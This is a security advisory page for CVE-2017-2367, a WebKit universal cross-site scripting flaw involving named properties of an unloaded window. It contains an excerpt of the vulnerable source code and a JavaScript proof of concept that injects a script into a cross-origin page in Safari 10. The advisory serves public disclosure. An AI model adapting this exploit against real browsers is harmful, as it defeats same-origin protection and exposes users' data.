Apple Webkit Cross-Site Scripting (Named Property from an Unloaded Window)

Published
Credit
Risk
2017.04.05
Google Security Research
Low
CWE
CVE
Local
Remote
N/A
CVE-2017-2367
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

<!--

The frame is not detached from an unloaded window. We can access to the new document's named properties via the following function.

static bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)
{
...
Document* document = frame.document(); <<-------- the new document.
if (is<HTMLDocument>(*document)) {
auto& htmlDocument = downcast<HTMLDocument>(*document);
auto* atomicPropertyName = propertyName.publicName();
if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {
JSValue namedItem;
if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {
Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);
ASSERT(collection->length() > 1);
namedItem = toJS(exec, thisObject->globalObject(), collection);
} else
namedItem = toJS(exec, thisObject->globalObject(), htmlDocument.windowNamedItem(*atomicPropertyName));
slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);
return true;
}
}

return false;
}

PoC:
-->

"use strict";

let f = document.body.appendChild(document.createElement("iframe"));
let get_element = f.contentWindow.Function("return logo;");

f.onload = () => {
f.onload = null;

let node = get_element();

var sc = document.createElement("script");
sc.innerText = "alert(location)";
node.appendChild(sc);
};

f.src = "https://abc.xyz/";

<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1063


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com